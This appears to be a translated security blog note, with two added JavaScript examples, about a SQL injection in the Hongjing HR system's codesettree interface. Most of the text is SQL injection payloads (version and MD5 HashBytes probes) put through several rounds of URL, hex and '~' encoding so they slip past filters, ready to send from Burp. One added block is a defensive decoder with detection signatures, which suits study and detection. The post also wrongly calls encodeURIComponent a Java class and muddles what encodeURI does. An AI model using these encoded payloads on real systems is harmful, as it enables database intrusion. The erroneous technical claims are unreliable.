Notes inspired by the vulnerability entry 《宏景人力资源信息管理系统 codesettree 接口 SQL 注入漏洞》 (SQL injection in the codesettree interface of the Hongjing HR information management system).

The encoding used there applies a sneaky trick to certain special characters: a percent sign followed by the hex value. The whole string is first URL-encoded once in the normal way, and then some special characters are encoded again.
It is not simply URL-encoding several times over; it is a different kind of URL encoding, called encodeURIComponent, which is a class in Java.

Java has two ways of URL-encoding: encodeURI and encodeURIComponent.

I then found that encodeURI does not decode %2C, that is, it does not encode these special characters.
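To make the encodeURI / encodeURIComponent difference concrete, here is an added example (not code from the original post). Both names are built-in ECMAScript globals, so the block runs in Node as-is. It feeds the post's own sample payload through both encoders and then surveys the full printable ASCII range (constructed here, not from the post) to list which characters only encodeURIComponent escapes and which neither encoder ever touches:

```javascript
// Added example (not from the original post): compare the two built-in
// JavaScript encoders. Both are ECMAScript globals; no imports are needed.

// The post's sample payload, copied verbatim.
const SAMPLE_PAYLOAD = "1' union all select 849754578,(select @@VERSION) --";

// Printable ASCII (0x20..0x7E), constructed here to survey the full
// difference between the two encoders rather than just one payload.
const PRINTABLE_ASCII = Array.from({ length: 0x7f - 0x20 }, (_, i) =>
  String.fromCharCode(0x20 + i)).join("");

// Run both encoders over a string and return the results side by side.
function encodeBoth(s) {
  return { uri: encodeURI(s), component: encodeURIComponent(s) };
}

// Characters that encodeURI passes through unchanged but encodeURIComponent
// escapes: the URI "reserved" set (;,/?:@&=+$#). A filter that only expects
// encodeURI-style input will never see these bytes in escaped form, which is
// the asymmetry the post is describing.
function componentOnlyEscapes(s) {
  const out = new Set();
  for (const ch of s) {
    if (encodeURI(ch) === ch && encodeURIComponent(ch) !== ch) out.add(ch);
  }
  return [...out].join("");
}

// Non-alphanumeric characters neither encoder touches (-_.!~*'()): these
// reach the backend literally no matter which encoder the client used, so a
// check that keys on "%27" alone will never see a quote sent this way.
function neverEscaped(s) {
  return [...s]
    .filter((ch) => /[^A-Za-z0-9]/.test(ch) && encodeURIComponent(ch) === ch)
    .join("");
}

console.log(encodeBoth(SAMPLE_PAYLOAD));
console.log("escaped only by encodeURIComponent:", componentOnlyEscapes(PRINTABLE_ASCII));
console.log("never escaped:", neverEscaped(PRINTABLE_ASCII));
```

Note that neither function produces the `%27`, `%28`, `%29` seen in the post's first encoded string; that output came from a different online encoder, which is exactly why a server-side normalizer cannot assume one particular encoder was used.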


(Tool used: URL Decode Online | URLDecoder)

An example

1' union all select 849754578,(select @@VERSION) --

First URL-encoding pass, over the whole string (tool: URL Encode Online | URLEncoder):

1%27%20union%20all%20select%20849754578%2C%28select%20%40%40VERSION%29%20--

You will notice that the digits and the `--` were not encoded, so you have to look up their hex values, prefix each with `%`, and encode again:

%31%27%20union%20all%20select%20%38%34%39%37%35%34%35%37%38%2C%28select%20%40%40VERSION%29%20%2d%2d

If necessary, also replace `%` with `~`:

~31~27~20union~20all~20select~20~38~34~39~37~35~34~35~37~38~2c~28select~20~40~40VERSION~29~20~2d~2d

This string can then be sent as a GET request from Burp.

Multiple URL-encoding example

Multiple URL encoding is simply hex encoding applied several times.

Final encoded result:

%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%63%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%63%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%33%25%32%35%25%33%32%25%36%35%25%32%35%25%33%36%25%33%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%35%25%36%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%31%25%32%35%25%33%36%25%36%63%25%32%35%25%33%37%25%33%36%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%32%25%32%35%25%33%36%25%33%32%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%36%36%25%32%35%25%33%37%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%37%25%33%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%34%25%33%38%25%32%35%25%33%36%25%33%31%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%38%25%32%35%25%33%34%25%33%32%25%32%35%25%33%37%25%33%39%25%32%35%25%33%37%25%33%34%25%32%35%25%33%36%25%33%35%25%32%35%25%33%37%25%33%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%32%25%33%37%25%32%35%25%33%34%25%36%64%25%32%35%25%33%34%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%63%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31%25%32%35%25%33%33%25%33%32%25%32%35%25%33%33%25%33%33%25%32%35%25%33%33%25%33%34%25%32%35%25%33%33%25%33%35%25%32%35%25%33%33%25%33%36%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%63%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%63%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31

Decoded once:

%25%33%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%33%25%37%39%25%37%33%25%32%65%25%36%36%25%36%65%25%35%66%25%37%33%25%37%31%25%36%63%25%37%36%25%36%31%25%37%32%25%36%32%25%36%31%25%37%33%25%36%35%25%37%34%25%36%66%25%37%33%25%37%34%25%37%32%25%32%38%25%34%38%25%36%31%25%37%33%25%36%38%25%34%32%25%37%39%25%37%34%25%36%35%25%37%33%25%32%38%25%32%37%25%34%64%25%34%34%25%33%35%25%32%37%25%32%63%25%32%37%25%33%31%25%33%32%25%33%33%25%33%34%25%33%35%25%33%36%25%32%37%25%32%39%25%32%39%25%32%39%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%33%31

Decoded twice:

%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%73%65%6c%65%63%74%20%73%79%73%2e%66%6e%5f%73%71%6c%76%61%72%62%61%73%65%74%6f%73%74%72%28%48%61%73%68%42%79%74%65%73%28%27%4d%44%35%27%2c%27%31%32%33%34%35%36%27%29%29%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%31

Decoded three times:

1' union select 1%2c(select sys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'123456'))) union select 1%2c'1

Original payload:

1' union select 1,(select sys.fn_sqlvarbasetostr(HashBytes('MD5','123456'))) union select 1,'1

Forward encoding example

Note: after each round of encoding, do not re-encode the special-character escapes that are already there. For example, if it is already %2c, do not encode it again.

Original payload:

1' union select 1,(select @@VERSION) union select 1,'1

Encode the special characters:

1' union select 1%2c(select %40%40VERSION) union select 1%2c'1

First encoding

Convert to hex, then put a percent sign in front of each byte; a regex does it: find `(..)`, replace with `%\1`.

Note: %2c and %40 are left as they are, not encoded.

%31%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%28%73%65%6c%65%63%74%20%40%40%56%45%52%53%49%4f%4e%29%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%31

Second encoding

Just put the string above through the hex converter again and add `%`.

(Tool: hex conversion, hex to text string, online hex conversion | online tools (sojson.com))

%25%33%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%34%30%25%34%30%25%35%36%25%34%35%25%35%32%25%35%33%25%34%39%25%34%66%25%34%65%25%32%39%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%33%31

Third encoding

Through the hex converter once more:

%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%38%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%35%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%33%25%33%31
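Both walkthroughs above (the decode-three-times chain and the forward encoding) are what a request normalizer in a WAF or a log-review script has to undo before any SQL-injection rule can see the real text. The following is an added example, not code from the original post: it strips one layer of `%HH` escapes per pass (and, since the post mentions swapping `%` for `~`, optionally `~HH`), repeats until the string stops changing, counts the layers, and runs a crude signature check over the result. The signature list and the "two or more layers is suspicious" threshold are my own assumptions for the demonstration; the two-layer sample is the post's "second encoding" string and the tilde sample is the post's `~`-substituted string.

```javascript
// Added example (not from the original post): decode layered percent-encoding
// the way a request normalizer should, then inspect the result.

// Upper bound on decode passes so a pathological input cannot spin the loop.
const MAX_LAYERS = 8;

// Decode exactly one layer of <escape>HH. Malformed sequences such as a
// trailing "%2" are left untouched instead of throwing (decodeURIComponent
// would throw a URIError). Bytes map 1:1 to code units, i.e. the input is
// assumed to be ASCII; multibyte UTF-8 would need a byte buffer instead.
function decodeOnce(s, escape = "%") {
  const esc = escape.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(esc + "([0-9A-Fa-f]{2})", "g");
  return s.replace(re, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Strip layers until a pass changes nothing. "%" is decoded before "~" in each
// pass. Enable "~" only where the backend is known to treat it as an escape;
// otherwise ordinary data such as "~ab" in a path would be mangled.
function normalize(s, escapes = ["%", "~"], maxLayers = MAX_LAYERS) {
  let cur = s;
  let layers = 0;
  while (layers < maxLayers) {
    let next = cur;
    for (const e of escapes) next = decodeOnce(next, e);
    if (next === cur) break;
    cur = next;
    layers += 1;
  }
  return { decoded: cur, layers, hitLimit: layers === maxLayers };
}

// Crude indicators for the demonstration only (assumed list, not a real rule set).
const SIGNATURES = ["union select", "union all select", "@@version", "hashbytes("];

// Normalize first, then look for indicators: the layer count itself is a
// finding, because legitimate clients do not double- or triple-encode.
function assess(raw) {
  const { decoded, layers, hitLimit } = normalize(raw);
  const findings = [];
  if (layers >= 2) findings.push(`${layers} encoding layers`);
  if (hitLimit) findings.push("decode limit reached");
  const low = decoded.toLowerCase();
  for (const sig of SIGNATURES) if (low.includes(sig)) findings.push(`signature: ${sig}`);
  return { decoded, layers, findings };
}

// The post's "second encoding" string (two layers), split for readability.
const TWO_LAYER_SAMPLE =
  "%25%33%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39" +
  "%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63" +
  "%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63" +
  "%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33" +
  "%25%37%34%25%32%30%25%34%30%25%34%30%25%35%36%25%34%35" +
  "%25%35%32%25%35%33%25%34%39%25%34%66%25%34%65%25%32%39" +
  "%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65" +
  "%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33" +
  "%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%33%31";

// The post's "~"-substituted string (one layer, non-standard escape).
const TILDE_SAMPLE =
  "~31~27~20union~20all~20select~20~38~34~39~37~35~34~35~37~38~2c~28select~20~40~40VERSION~29~20~2d~2d";

console.log(assess(TWO_LAYER_SAMPLE));
console.log(assess(TILDE_SAMPLE));
```

The point of looping to a fixed point rather than calling the platform decoder once is visible in the first sample: a single decode yields the post's "first encoding" string, which still contains no SQL keywords in clear text, and only the second pass exposes `union select`. Any rule applied before normalization, or after exactly one decode, misses it.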
